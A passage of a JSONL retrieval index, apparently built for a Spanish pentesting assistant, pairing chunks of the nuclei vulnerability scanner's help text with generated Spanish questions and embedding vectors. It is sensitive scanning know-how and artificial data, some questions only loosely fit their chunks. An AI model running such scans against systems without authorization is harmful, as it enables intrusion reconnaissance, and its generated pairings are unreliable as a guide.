0.01183, 0.01786, -0.07717, 0.11051, 0.04245, 0.00455, -0.05448, -0.07573, 0.00674, 0.03371, -0.00845, -0.04585, 0.01115, 0.00839, -0.01545, -0.00194, 0.09424, -0.08218, -0.0233, -0.0934, -0.05487, -0.02382, 0.06423, -0.04055, 0.02804, -0.05272, 0.01007, 0.01671, 0.07771, -0.06359, 0.00566, 0.07403, -0.00225, -0.0432, -0.05693, -0.02587, -0.01866, 0.03119, -0.02944, -0.03708, -0.10423, 0.06007, 0.05534, -0.01792, -0.01299, -0.06019, 0.06449, -0.06667, -0.10845, -0.00602, 0.02765, 0.02713, 0.0341, -0.04583, -0.01237, -0.0474, -0.00586, 0.02079, -0.09935, 0.02371, -0.00473, 0.06886, 0.05202, 0.02411, 0.07007, 0.00738, 0.02133, -0.04374, 0.0161, -0.13646, -0.02841, 0.0004, -0.00811, 0.01963, -0.00785, 0.0513, 0.0255, -0.09895, -0.02501, 0.02442, -0.00336, 0.03456, 0.02998, 0.10839, -0.00546, 0.06517, 0.08132, -0.07441, 0.05931, 0.01866, 0.02749, -0.02327, -0.03114, -0.01923, 0.07866, 0.03153, 0.04522, 0.07455, 0.07324, -0.03938, -0.01772, 0.00947, -0.02335, 0.03375, 0.01932, -0.06609, 0.04694, -0.01317, -0.00527, -0.05344, 0.08553, 0.03932, -0.05199, -0.01824, 0.03454, 0.07094, 0.02443, 0.09781, -0.0578]} +{"tipo": "pregunta", "herramienta": "nuclei", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/nuclei.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "UPDATE:\n -up, -update update nuclei engine to the latest released version\n -ut, -update-templates update nuclei-templates to latest released version\n -ud, -update-template-dir string custom directory to install / update nuclei-templates\n -duc, -disable-update-check disable automatic nuclei/templates update check\n\nSTATISTICS:\n -stats display statistics about the running scan\n -sj, -stats-json display statistics in JSONL(ines) format\n -si, -stats-interval int number of seconds to wait between showing a statistics update (default 5)\n -mp, -metrics-port int port to expose nuclei metrics on (default 9092)\n -hps, -http-stats enable http status capturing (experimental)", "indexar": "quΓ© herramienta sirve para escanear sitios web y mostrar estadΓ­sticas en tiempo real?", "v": [-0.03808, 0.0482, -0.14212, -0.08887, 0.08181, -0.16971, -0.07227, -0.18926, 0.06268, 0.00593, -0.10169, -0.07094, -0.01163, -0.06258, 0.14944, 0.07923, 0.12792, -0.06329, 0.0759, 0.0073, -0.01536, -0.03601, -0.12131, 0.01745, -0.11905, -0.07212, 0.03241, -0.02833, -0.19503, 0.12002, -0.00037, 0.10403, 0.0074, -0.03645, -0.07793, -0.06685, 0.08315, 0.04171, -0.07103, -0.0613, 0.04574, 0.00094, -0.04934, -0.03596, -0.03437, -0.0137, -0.14334, 0.02929, -0.03312, 0.00807, -0.07201, -0.06455, -0.0859, 0.01347, -0.02085, -0.10017, 0.14492, -0.12145, 0.0696, -0.06986, -0.12009, 0.02285, -0.05946, -0.03962, 0.00481, 0.01034, -0.00208, 0.01922, -0.05444, -0.04387, -0.0465, 0.05292, 0.08337, -0.02696, 0.04808, -0.06381, 0.00113, 0.03813, -0.00492, -0.03548, 0.03719, -0.06025, -0.10932, 0.06225, -0.08688, -0.00381, 0.05843, -0.11903, 0.01603, -0.11418, 0.06021, 0.13624, -0.01014, 0.02114, -0.00325, -0.0475, 0.10749, -0.0981, 0.04475, -0.04571, 0.09228, -0.07314, -0.10744, 0.01985, 0.02302, 0.08907, 0.01243, -0.05684, -0.13006, 0.01249, 0.03449, -0.00842, -0.09822, -4e-05, 0.00353, 0.06196, 0.06741, -0.07897, -0.00292, -0.09898, -0.0008, 0.07267, -0.07627, -0.02928, -0.10399, -0.00618, 0.03337, -0.01202, 0.04357, -0.08033, -0.04164, -0.07711, -0.07659, 0.03483, -0.05929, -0.02624, 0.02405, -0.07418, 0.07988, -0.05256, 0.018, 0.02393, -0.10374, -0.10112, -0.01824, -0.00847, 0.05203, -0.00207, -0.13005, -0.03428, 0.00912, -0.00982, -0.01008, 0.04052, -0.01077, -0.02788, -0.07975, 0.0087, -0.12084, -1e-05, -0.01161, -0.00279, 0.07583, -0.02289, 0.03164, -0.04106, -0.01224, 0.10104, 0.08788, 0.04928, 0.05171, 0.09797, 0.0324, -0.12175, 0.01627, 0.01493, -0.04076, -0.02678, -0.0242, -0.09957, 0.01702, -0.04435, -0.00292, 0.00252, 0.0208, -0.04114, 0.00888, -0.05307, -0.03496, 0.08353, 0.02931, -0.03572, 0.0625, 0.0198, 0.0644, 0.03179, 0.01246, -0.05145, 0.0795, -0.06769, -0.0403, -0.06909, 0.01492, -0.01724, -0.01308, 0.10111, -0.02393, -0.02752, -0.01526, 0.02899, -0.00122, -0.00656, -0.02215, -0.06771, -0.01256, -0.07124, 0.06138, -0.00028, -0.06206, -0.02825, 0.04132, -0.0056, 0.01516, -0.01258, -0.014, 0.04769, 0.05224, 0.00334, 0.00245, -0.00838, -0.02869, -0.02389, -0.02517, 0.03188, 0.00528, -0.07292, 0.03275, -0.00042, -0.06228, -0.07419, -0.01161, 0.01829, -0.00954, -0.00704, 0.00622, -0.05241, -0.0546, -0.04759, -0.00615, -0.06158, -0.07514, -0.03221, 0.04124, -0.01935, 0.0434, -0.01512]} +{"tipo": "pregunta", "herramienta": "nuclei", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/nuclei.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "UPDATE:\n -up, -update update nuclei engine to the latest released version\n -ut, -update-templates update nuclei-templates to latest released version\n -ud, -update-template-dir string custom directory to install / update nuclei-templates\n -duc, -disable-update-check disable automatic nuclei/templates update check\n\nSTATISTICS:\n -stats display statistics about the running scan\n -sj, -stats-json display statistics in JSONL(ines) format\n -si, -stats-interval int number of seconds to wait between showing a statistics update (default 5)\n -mp, -metrics-port int port to expose nuclei metrics on (default 9092)\n -hps, -http-stats enable http status capturing (experimental)", "indexar": "con quΓ© puedo actualizar el motor de escaneo automΓ‘ticamente sin tener que hacerlo manualmente?", "v": [0.0289, 0.21609, -0.202, 0.03862, 0.07331, -0.04039, -0.07053, -0.02355, -0.19928, -0.08453, -0.17837, -0.03451, 0.04006, -0.05754, 0.01538, 0.04489, 0.03333, -0.10704, -0.03687, 0.08611, 0.01546, -0.08049, 0.01734, -0.02645, 0.04195, 0.0763, 0.00638, 0.02451, -0.26176, -0.03821, 0.04752, 0.1106, 0.09743, 0.04099, -0.02128, 0.03713, 0.04542, 0.0138, -0.0428, -0.0042, -0.00708, 0.07569, -0.11474, 0.00931, 0.01239, 0.01781, 0.08309, -0.00539, 0.00292, -0.05286, -0.03298, 0.02183, 0.04523, -0.04814, -0.00835, -0.02375, 0.2357, -0.06955, 0.05198, -0.11273, -0.01425, 0.14214, -0.04205, 0.10506, -0.07871, -0.00429, 0.01927, -0.0553, -0.0348, 0.10306, -0.03398, 0.01578, 0.08946, 0.01751, -0.07631, -0.01592, 0.02723, -0.02176, 0.0646, 0.02976, -0.03703, -0.06734, -0.07307, 0.04469, -0.07112, -0.06579, 0.01386, -0.10019, -0.04134, -0.10014, 0.05994, -0.08333, -0.00019, 0.05516, 0.04841, 0.03086, 0.10327, -0.06098, -0.00983, 0.03684, 0.04175, -0.09966, 0.01881, 0.14724, 0.07096, 0.02925, 0.07345, 0.02117, 0.02115, -0.00146, -0.05327, 0.04439, -0.07536, -0.04613, -0.03058, 0.0341, -0.06155, -0.05546, -0.02275, 0.00934, -0.12704, -0.10661, -0.02114, -0.03004, 0.00082, -0.03209, -0.02995, 0.10929, -0.00695, -0.02384, -0.01356, -0.03309, -0.02975, -0.07811, -0.04429, 0.04693, -0.05055, 0.01628, 0.00752, -0.03404, 0.01714, 0.08544, 0.02215, -0.05412, 0.03783, -0.04124, -0.06254, -0.09823, -0.04677, 0.00947, -0.00774, 0.00078, 0.03399, 0.11809, -0.01027, 0.02942, -0.0083, -0.04095, 0.05249, 0.08345, -0.00455, -0.02703, -0.04724, 0.0506, -0.05638, -0.04177, -0.04542, -0.02674, 0.00777, -0.02551, 0.00511, 0.06873, -0.0519, -0.02425, 0.04795, 0.03137, 0.00393, -0.01705, 0.04567, 0.01218, -0.04919, 0.0725, -0.02603, -0.03323, -0.04891, -0.03839, 0.03555, -0.03612, 0.029, 0.07141, 0.01337, 0.04325, -0.01765, 0.00239, 0.02664, -0.01471, -0.08068, -0.00409, 0.01569, -0.00297, -0.07623, 0.03287, -0.02609, -0.05697, 0.0501, 0.05287, -0.05038, 0.0198, 0.01417, 0.05436, -0.01574, -0.03179, 0.0961, -0.02128, -0.01501, 0.02415, 0.00163, -0.06161, 0.00096, -4e-05, 0.03683, -0.049, 0.14442, -0.04559, -0.0302, 0.03164, 0.05637, 0.07804, 0.10504, 0.078, -0.06745, 0.10089, -0.00939, -0.03011, 0.11966, 0.0607, 0.04958, -0.03857, -0.0562, -0.01101, 0.05754, 0.0296, 0.01368, -0.06806, 0.00222, -0.09016, -0.03861, 0.02877, 0.0142, -0.03425, -0.03991, 0.04864, -0.00952, -0.02696, 0.02503, -0.03109]} +{"tipo": "pregunta", "herramienta": "nuclei", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/nuclei.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "UPDATE:\n -up, -update update nuclei engine to the latest released version\n -ut, -update-templates update nuclei-templates to latest released version\n -ud, -update-template-dir string custom directory to install / update nuclei-templates\n -duc, -disable-update-check disable automatic nuclei/templates update check\n\nSTATISTICS:\n -stats display statistics about the running scan\n -sj, -stats-json display statistics in JSONL(ines) format\n -si, -stats-interval int number of seconds to wait between showing a statistics update (default 5)\n -mp, -metrics-port int port to expose nuclei metrics on (default 9092)\n -hps, -http-stats enable http status capturing (experimental)", "indexar": "existe alguna opciΓ³n para ocultar los datos tΓ©cnicos de rendimiento al pΓΊblico?", "v": [0.00623, 0.11313, -0.12085, -0.19825, 0.08256, -0.09874, 0.00425, -0.04707, -0.10954, -0.01129, -0.06414, -0.15091, 0.04028, 0.04599, 0.09889, -0.07941, 0.07021, -0.13268, 0.07544, -0.01082, -0.11966, -0.07346, -0.02275, -0.04157, -0.02533, 0.01453, -0.03521, 0.01031, -0.18326, -0.0478, 0.05905, -0.00368, -0.08841, -0.06824, 0.0158, 0.06986, -0.01398, 6e-05, 0.00223, 0.00475, -0.02529, -0.02826, -0.01425, 0.05253, 0.16494, 0.06779, -0.1296, 0.16501, 0.04891, -0.11147, -0.02887, -0.06127, -0.00601, -0.07161, -0.016, -0.13756, 0.07427, -0.00863, 0.07811, -0.03413, 0.03092, 0.03299, -0.00915, -0.06499, 0.07743, 0.0269, 0.01491, -0.00424, 0.01225, 0.07744, 0.03517, 0.05466, -0.02273, -0.02262, 0.03424, 0.05074, -0.00333, 0.07482, -0.07106, 0.03843, -0.08534, 0.03901, -0.05036, 0.07119, -0.1204, -0.10202, 0.04444, -0.01522, -0.03968, -0.03639, 0.07856, 0.09348, -0.03681, 0.0234, 0.01022, 0.0657, 0.1125, -0.06143, -0.06111, 0.01563, 0.05, 0.0655, -0.06806, 0.00399, 0.04017, 0.13198, 0.07999, -0.09711, -0.05801, -0.01284, 0.014, -0.0516, -0.11975, -0.01851, 0.02899, -0.07651, -0.03445, -0.08944, -0.05265, 0.05203, -0.06026, -0.07701, 0.10053, -0.06842, -0.008, -0.10399, -0.03565, 0.01369, 0.0198, 0.05437, -0.03323, -0.03649, -0.05978, -0.02708, -0.01855, 0.05574, -0.05431, -0.0596, -0.01335, -0.03108, 0.05742, 0.02738, -0.14122, -0.02956, 0.04889, -0.14131, 0.02658, 0.00771, -0.05837, -0.00474, 0.05322, -0.00953, 0.01069, 0.07494, -0.07283, 0.05446, 0.03334, -0.08906, 0.00066, 0.0639, -0.02784, 0.00827, -0.05098, 0.05567, 0.0016, -0.00597, -0.00867, -0.02292, 0.08514, -0.00614, 0.00607, 0.06515, 0.02979, -0.2128, 0.02538, -0.03925, -0.02082, -0.06235, 0.03551, -0.02345, 0.04309, -0.0362, 0.02725, -0.04442, 0.05626, -0.07298, -0.0117, -0.09095, -0.0251, -0.0769, 0.0562, 0.0324, 0.05299, -0.01844, -0.01415, -0.08092, -0.01251, -0.05444, 0.10892, 0.0239, -0.04199, 0.03919, -0.04845, 0.00051, -0.00015, 0.06795, -0.04011, -0.04331, -0.01877, -0.03467, 0.06329, -0.05792, 0.04442, -0.04518, -0.03529, 0.02009, 0.03869, -0.05698, 0.00148, 0.02882, -0.03644, -0.00586, 0.06676, 0.00092, 0.04833, -0.0005, 0.04283, -0.01033, 0.02683, -0.02516, 0.00145, 0.07177, 0.00423, 0.041, 0.05689, -0.0111, -0.00378, -0.08439, -0.02201, -0.0411, 0.0284, 0.05337, 0.0086, -0.06172, -0.00375, -0.02941, -0.12144, 0.06347, 0.00369, -0.1222, 0.02295, -0.01668, -0.00352, -0.023, 0.06678, -0.08558]} +{"tipo": "pregunta", "herramienta": "nuclei", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/nuclei.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "CLOUD:\n -auth configure projectdiscovery cloud (pdcp) api key (default true)\n -tid, -team-id string upload scan results to given team id (optional) (default \"none\")\n -cup, -cloud-upload upload scan results to pdcp dashboard [DEPRECATED use -dashboard]\n -sid, -scan-id string upload scan results to existing scan id (optional)\n -sname, -scan-name string scan name to set (optional)\n -pd, -dashboard upload / view nuclei results in projectdiscovery cloud (pdcp) UI dashboard\n -pdu, -dashboard-upload string upload / view nuclei results file (jsonl) in projectdiscovery cloud (pdcp) UI dashboard\n\nAUTHENTICATION:\n -sf, -secret-file string[] path to config file containing secrets for nuclei authenticated scan\n -ps, -prefetch-secrets prefetch secrets from the secrets file\n\nEXAMPLES:\nRun nuclei on single host:\n\t$ nuclei -target example.com\n\nRun nuclei with specific template directories:\n\t$ nuclei -target example.com -t http/cves/ -t ssl\n\nRun nuclei against a list of hosts:\n\t$ nuclei -list hosts.txt\n\nRun nuclei with a JSON output:\n\t$ nuclei -target example.com -json-export output.json", "indexar": "con que puedo hacer un escaneo de vulnerabilidades en modo autenticado?", "v": [-0.01021, 0.00826, -0.23937, 0.11139, 0.05599, 0.06873, -0.04813, -0.06492, -0.14364, -0.00026, -0.03247, -0.04405, -0.0761, -0.05119, -0.05525, 0.07591, 0.06137, -0.05091, 0.06594, 0.16328, 0.00723, -0.11245, -0.04846, -0.02441, 0.02627, 0.04139, -0.06363, 0.16368, 0.00778, 0.03771, -0.05863, 0.09424, 0.07049, 0.02146, 0.00345, 0.08113, 0.06634, -0.00505, 0.09846, 0.08325, 0.05043, 0.0786, -0.0276, -0.12977, 0.07567, -0.04816, -0.07162, -0.07613, -0.03153, 0.07999, -0.07142, -0.10273, -0.20401, -0.07155, -0.04883, -0.03325, 0.22075, -0.01828, 0.09557, -0.02739, -0.12871, 0.11138, 0.13011, 0.0552, -0.04099, 0.00373, 0.01869, 0.07783, -0.03409, 0.09512, -0.03326, 0.00581, -0.00266, 0.01517, -0.05981, -0.0504, -0.03169, -0.0533, 0.02138, 0.03799, -0.04654, 0.05759, 0.00771, -0.01846, -0.22175, -0.06372, 0.06931, -0.04593, 0.06183, -0.03883, 0.11254, 0.01789, 0.01237, -0.01695, 0.02412, -0.03092, 0.07378, -0.01208, -0.04928, -0.00791, -0.04445, -0.03944, -0.08696, 0.12364, 0.06614, 0.09615, -0.03158, 0.0221, 0.0166, 0.00288, -0.13103, 0.02407, -0.09617, -0.02028, 0.01576, 0.07608, -0.0199, -0.02206, 0.09, -0.02533, -0.06203, -0.1574, -0.03631, -0.02681, 0.02087, 0.05177, -0.04949, 0.03222, 0.02054, -0.01061, -0.02074, -0.05244, -0.05589, 0.01527, -0.01971, -0.00776, 0.07017, -0.10973, 0.01471, 0.00414, 0.01444, 0.05422, 0.04019, 0.01224, -0.03153, 0.10627, -0.06074, -0.09107, -0.13329, 0.01855, 0.02803, 0.05977, -0.07303, 0.08081, -0.07048, -0.01133, -0.01061, -0.01682, 0.04643, 0.12117, 0.01048, 0.0736, -0.02373, 0.09308, -0.01633, -0.03423, 0.00881, 0.00901, -0.02522, -0.03532, -0.04227, 0.11766, 0.06594, -0.02835, 0.06031, 0.0173, 0.0209, -0.06099, -0.00677, -0.03023, 0.00288, -0.00823, 0.02345, 0.00659, 0.04487, 0.02012, -0.02922, -0.01663, 0.02277, 0.05345, 0.01229, -0.00573, 0.00665, 0.04799, 0.00404, 0.01356, 0.00996, 0.03043, 0.0012, -0.00876, -0.08891, -0.02543, -0.02547, -0.0367, 0.06087, 0.06917, -0.05852, -0.04687, -0.01809, 0.07095, 0.00826, 0.01107, 0.08311, -0.08557, -0.0312, -0.00997, -0.00524, 0.02588, -0.03714, -0.04598, -0.01866, -0.03339, 0.05456, 0.02093, -0.00423, 0.01463, 0.01362, -0.08505, 0.0101, 0.02402, 0.03021, -0.05643, -0.05319, -0.03641, 0.05223, 0.02158, 0.02492, 0.00751, -0.01247, -0.01101, 0.02581, -0.02208, 0.00459, -0.0225, 0.00741, -0.04304, -0.0414, 0.04349, -0.01163, -0.05391, -0.03362, 0.02588, 0.03504, -0.03924, 0.02098, -0.08132]} +{"tipo": "pregunta", "herramienta": "nuclei", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/nuclei.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "CLOUD:\n -auth configure projectdiscovery cloud (pdcp) api key (default true)\n -tid, -team-id string upload scan results to given team id (optional) (default \"none\")\n -cup, -cloud-upload upload scan results to pdcp dashboard [DEPRECATED use -dashboard]\n -sid, -scan-id string upload scan results to existing scan id (optional)\n -sname, -scan-name string scan name to set (optional)\n -pd, -dashboard upload / view nuclei results in projectdiscovery cloud (pdcp) UI dashboard\n -pdu, -dashboard-upload string upload / view nuclei results file (jsonl) in projectdiscovery cloud (pdcp) UI dashboard\n\nAUTHENTICATION:\n -sf, -secret-file string[] path to config file containing secrets for nuclei authenticated scan\n -ps, -prefetch-secrets prefetch secrets from the secrets file\n\nEXAMPLES:\nRun nuclei on single host:\n\t$ nuclei -target example.com\n\nRun nuclei with specific template directories:\n\t$ nuclei -target example.com -t http/cves/ -t ssl\n\nRun nuclei against a list of hosts:\n\t$ nuclei -list hosts.txt\n\nRun nuclei with a JSON output:\n\t$ nuclei -target example.com -json-export output.json", "indexar": "cual es la herramienta para subir los resultados de un escaneo a un dashboard?", "v": [-0.14166, -0.02208, -0.2503, -0.11512, -0.00478, -0.1285, -0.12102, -0.07339, -0.00927, -0.01039, -0.18497, -0.14231, -0.10855, -0.13651, -0.07614, 0.03573, 0.01288, -0.07914, -0.0414, 0.04925, 0.02095, 0.06257, -0.08223, 0.00899, -0.06281, -0.02183, 0.02079, 0.09247, -0.25793, 0.03294, 0.04874, 0.07188, 0.0086, -0.0008, -0.09572, -0.09004, 0.07831, 0.01805, -0.0146, -0.03347, -0.0632, 0.05467, -0.11548, -0.06866, 0.03831, -0.05489, -0.04528, 0.07767, -0.03308, 0.03932, -0.00019, -0.00628, -0.06947, 0.01005, -0.00966, -0.15193, 0.16869, -0.09107, 0.12101, -0.12701, -0.08399, 0.06618, -0.00137, -0.00698, -0.16332, -0.05036, 0.01599, -0.02821, -0.0271, 0.08479, 0.07328, -0.01413, 0.07918, -0.01101, -0.00716, -0.00257, 0.03223, 0.02271, -0.01805, -0.04637, 0.05181, -0.04074, -0.12235, 0.06976, -0.12634, -0.08945, 0.07005, -0.08863, -0.00911, 0.04957, -0.0069, -0.01412, 0.01448, 0.01265, -0.05328, 0.00365, 0.10774, -0.08962, -0.0288, -0.0957, 0.11103, -0.09609, -0.06816, 0.13081, 0.07249, 0.07812, -0.03859, -0.04925, -0.10044, 0.05844, 0.0576, 0.05171, -0.02037, 0.00285, -0.04315, 0.03579, -0.03409, -0.05891, -0.04637, -0.08195, 0.04358, 0.06594, -0.02633, -0.03705, -0.01011, -0.00077, -0.00499, 0.06589, 0.03165, -0.00353, 0.02173, -0.00412, -0.08123, 0.01656, -0.01474, -0.02726, 0.00418, -0.09308, 0.02435, -0.03514, 0.0209, 0.05401, -0.00328, -0.15939, 0.044, -0.03544, 0.00091, 0.00176, -0.04615, 0.05701, -0.02454, 0.03152, 0.00082, 0.01884, -0.01161, -0.02769, 0.04495, 0.00506, -0.02354, 0.01746, -0.04415, -0.0935, 0.0608, 0.12205, 0.0178, -0.03454, -0.0032, 0.02524, 0.0417, -0.01173, 0.05044, 0.0731, 0.0428, -0.05277, 0.01859, -0.04543, -0.05714, 0.00403, -0.00668, -0.02551, -0.01745, 0.04662, -0.001, -0.02451, -0.01977, -0.08838, -0.01139, -0.05646, -0.00773, 0.04152, 0.00229, 0.05925, -0.02605, -0.09864, 0.01643, 0.00913, 0.00325, -0.06553, 0.0521, -0.02506, -0.03402, 0.00272, -0.06459, -0.06355, -0.00738, -0.00969, -0.02448, -0.02087, 0.03901, 0.03294, -0.00069, -0.00214, 0.02159, -0.02113, 0.02163, -0.00313, 0.02147, -0.01884, -0.05109, -0.01776, 0.05101, -0.0166, 0.06232, -0.03041, -0.07632, 0.03772, 0.01966, 0.02933, -0.03556, -0.01891, -0.01172, -0.04369, 0.0143, 0.01924, -0.00904, 0.01598, 0.06729, -0.03235, -0.03095, -0.05568, -0.01957, 0.07154, 0.05347, 0.00483, -0.07565, -0.07291, 0.00571, -0.0179, -0.015, -0.07191, -8e-05, -0.00875, 0.01871, -0.04539, 0.03513, -0.04704]} +{"tipo": "pregunta", "herramienta": "nuclei", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/nuclei.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "Run nuclei with sorted Markdown outputs (with environment variables):\n\t$ MARKDOWN_EXPORT_SORT_MODE=template nuclei -target example.com -markdown-export nuclei_report/\n\nAdditional documentation is available at: https://docs.nuclei.sh/getting-started/running\n```", "indexar": "que programa sirve para generar reportes de vulnerabilidades en formato markdown ordenados?", "v": [0.12803, 0.04158, -0.13312, -0.22034, 0.04927, -0.06833, -0.02547, -0.08748, -0.01458, -0.13356, -0.02573, -0.22923, 0.01669, -0.11514, -0.0038, 0.07482, 0.07955, -0.15826, 0.02563, 0.09196, -0.03169, -0.02396, 0.03231, -0.16214, -0.05586, 0.02034, -0.04952, -0.0632, -0.07776, 0.01847, 0.05449, -0.03528, 0.01095, -0.09331, -0.07409, 0.05286, 0.03308, 0.01105, -0.04097, 0.17491, 0.01818, 0.01055, -0.06097, -0.0162, 0.13574, -0.08597, 0.01034, 0.06278, 0.00118, -0.01335, 0.02088, -0.01838, -0.10046, 0.00537, 0.02512, -0.06289, 0.01354, -0.13665, -0.00323, 0.05964, -0.07011, 0.0014, 0.0924, -0.13291, 0.09019, 0.00524, 0.04953, 0.08001, -0.05346, 0.05293, 0.04287, -0.0344, 0.08085, -0.08277, -0.02744, 0.0108, -0.06238, -0.0162, -0.06066, 0.0182, -0.05377, 0.03682, 0.01338, 0.15126, -0.16001, -0.0137, 0.05433, 0.03905, -0.05443, -0.07535, 0.08073, 0.05858, 0.01419, 0.05926, 0.00324, -0.09422, 0.09128, 0.00152, -0.03101, 0.02701, -0.06084, -0.08512, -0.02569, 0.04435, -0.02508, 0.12765, 0.01883, -0.01597, 0.00257, 0.1084, 0.04832, 0.08661, -0.0275, 0.03587, -0.07004, -0.02314, 0.01246, 0.00241, 0.13242, 0.02114, -0.04179, 0.06967, -0.0723, 0.0933, -0.00946, 0.03753, 0.03546, -0.03277, 0.00903, 0.02895, 0.04812, 0.04429, -0.0189, -0.00738, -0.06576, -0.05692, 0.04935, -0.0089, -0.05871, -0.07282, 0.04714, 0.0777, 0.09447, 0.05858, -0.01328, -0.00907, 0.05225, -0.10455, -0.10452, 0.06971, 0.03034, 0.00722, -0.07553, -0.00585, -0.05408, -0.03621, -0.09466, -0.06533, -0.04177, 0.0441, -0.05788, 0.01646, -0.03496, 0.01668, 0.03347, -0.05989, 0.10025, 0.0408, 0.15142, 0.03771, -0.01439, 0.0195, 0.08651, -0.13358, 0.00318, -0.04418, -0.05245, -0.07209, -0.03476, -0.01987, -0.03496, -0.02101, 0.0519, 0.05591, -0.05905, -0.01745, -0.02055, 0.04338, 0.06894, -0.01443, -0.0496, 0.03758, -0.02552, -0.04285, 0.05027, -0.04127, -0.0044, 0.03888, -0.00246, -0.05188, -0.05549, -0.0178, -0.0226, 0.01759, 0.07909, 0.12913, -0.0015, -0.00713, 0.06462, 0.12669, -0.02796, -0.02682, -0.00152, -0.00763, -0.05177, -0.01854, -0.01446, 0.04083, 0.0138, -0.00848, -0.0275, -0.06049, 0.03264, 0.01176, 0.00867, -0.03486, 0.0046, -0.0622, -0.00701, -0.01164, 0.02997, -0.03836, -0.04505, -0.01086, 0.00889, -0.03917, -0.01598, 0.0214, 0.00268, -0.0701, -0.03034, 0.02191, 0.02685, -0.0483, -0.0316, 0.0213, -0.01986, 0.04143, 0.01577, -0.00874, -0.05801, 0.0646, 0.01715, -0.05351, -0.01629, -0.02532]} +{"tipo": "pregunta", "herramienta": "nuclei", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/nuclei.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "Run nuclei with sorted Markdown outputs (with environment variables):\n\t$ MARKDOWN_EXPORT_SORT_MODE=template nuclei -target example.com -markdown-export nuclei_report/\n\nAdditional documentation is available at: https://docs.nuclei.sh/getting-started/running\n```", "indexar": "con que herramienta puedo exportar los resultados de escaneos a un archivo markdown con un esquema personalizado?", "v": [0.03017, -0.01784, -0.14926, -0.26513, -0.04138, -0.10002, -0.11517, -0.04268, -0.09827, -0.06248, -0.12779, -0.07997, -0.01343, -0.06972, 0.09359, 0.06893, 0.13299, -0.06073, 0.05069, 0.10297, -0.00687, 0.00314, -0.13681, -0.04941, -0.09305, -0.01757, -0.05285, 0.12969, -0.23712, 0.0431, -0.02522, 0.15191, 0.0648, -0.10949, -0.03656, -0.04134, 0.12784, -0.00925, -0.03199, 0.07542, -0.01381, -0.00465, -0.15138, -0.04863, -0.03257, -0.03703, 0.00208, 0.13807, -0.03807, -0.01579, -0.01765, -0.16958, -0.10061, 0.00205, 0.00959, -0.09651, 0.08968, -0.07487, 0.07823, 0.04056, -0.05601, 0.01514, -0.0303, -0.08078, 0.04302, -0.02116, -0.03146, -0.00785, -0.00307, 0.08073, -0.00766, 0.11086, 0.04652, -0.01768, -0.00861, 0.02755, 0.00563, 0.00825, -0.07706, 0.06257, -0.0112, -0.09318, -0.0653, 0.09765, -0.09029, -0.08753, 0.00146, -0.001, 0.04371, -0.0961, -0.02957, -0.02392, -0.04425, 0.02205, -0.04703, -0.02011, 0.05037, -0.03296, -0.04969, -0.04275, 0.04193, 0.00662, -0.06128, 0.14945, 0.09943, 0.07498, 0.02536, 0.02662, -0.10858, 0.17914, 0.05566, 0.08689, 0.02249, 0.06883, -0.08934, -0.03102, -0.0178, 0.0083, 0.0053, -0.0141, -0.0249, 0.03139, -0.06118, -0.01915, -0.00576, -0.05513, -0.03314, 0.11849, -0.07144, -0.04109, 0.00153, 0.06312, -0.08534, 0.01493, -0.04153, 0.0286, 0.03401, -0.11819, -0.01025, -0.09702, 0.00491, -0.0233, 0.01121, -0.00687, 0.0501, -0.03017, 0.01675, -0.07039, -0.02957, -0.03368, 0.03852, -0.03872, -0.01435, -0.01963, -0.07365, 0.03571, 0.00817, -0.01114, 0.01745, 0.03449, -0.10845, -0.036, 0.01755, 0.03493, -0.01233, -0.0234, 0.02775, 0.0198, -0.00514, -0.02859, 0.02523, -0.00679, 0.05513, -0.08981, 0.04128, -0.01004, -0.07208, -0.07217, -0.04209, -0.03678, -0.04516, -0.0043, 0.02322, -0.00279, -0.00475, -0.08645, 0.02124, 0.02753, 0.02149, 0.00733, -0.00255, 0.11153, 0.02672, -0.07458, -0.0253, 0.04297, -0.00219, 0.02313, -0.00955, -0.01392, -0.04797, -0.0177, 0.05463, -0.0681, -0.0195, 0.0788, -0.06188, -0.03215, 0.07793, 0.02096, 0.0156, -0.009, 0.02151, -0.02724, -0.04545, 0.06291, -0.00586, 0.02569, -0.00884, -0.01271, -0.00842, 0.02178, 0.11038, -0.00106, -0.03418, 0.01761, -0.01716, 0.05356, -0.07073, -0.0407, 0.0192, 0.01423, -0.03732, 0.05214, 0.0233, -0.10112, 0.01131, -0.02971, -0.03705, -0.04044, -0.01009, 0.02179, 0.0452, 0.02231, -0.07209, -0.01927, -0.00401, 0.00694, 0.02523, -0.07737, -0.00123, 0.00801, 0.04463, -0.03595, 0.05426, -0.00967]} +{"tipo": "pregunta", "herramienta": "nuclei", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/nuclei.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "Run nuclei with sorted Markdown outputs (with environment variables):\n\t$ MARKDOWN_EXPORT_SORT_MODE=template nuclei -target example.com -markdown-export nuclei_report/\n\nAdditional documentation is available at: https://docs.nuclei.sh/getting-started/running\n```", "indexar": "cual es una alternativa libre para hacer anΓ‘lisis web y obtener salidas en texto plano ordenado?", "v": [0.01257, 0.14217, -0.11633, -0.08685, -0.02133, -0.10984, 0.02052, -0.10492, -0.15998, -0.03718, -0.08594, -0.24477, 0.05159, 0.00918, 0.04779, 0.0012, 0.13948, 0.00106, 0.13482, -0.03687, -0.10427, -0.07371, -0.11719, -0.06321, -0.09011, -0.08886, -0.03848, -0.02503, -0.11315, 0.0616, -0.03717, 0.02231, 0.05889, -0.04491, 0.00985, 0.0775, 0.11052, 0.14264, 0.02305, -0.04061, -0.06224, -0.0291, -0.01014, 0.06084, 0.00054, -0.12305, -0.04565, 0.10754, -0.00294, -0.00983, 0.06108, 0.01811, -0.05804, -0.03795, -0.00501, -0.01509, 0.23204, -0.10165, -0.03398, 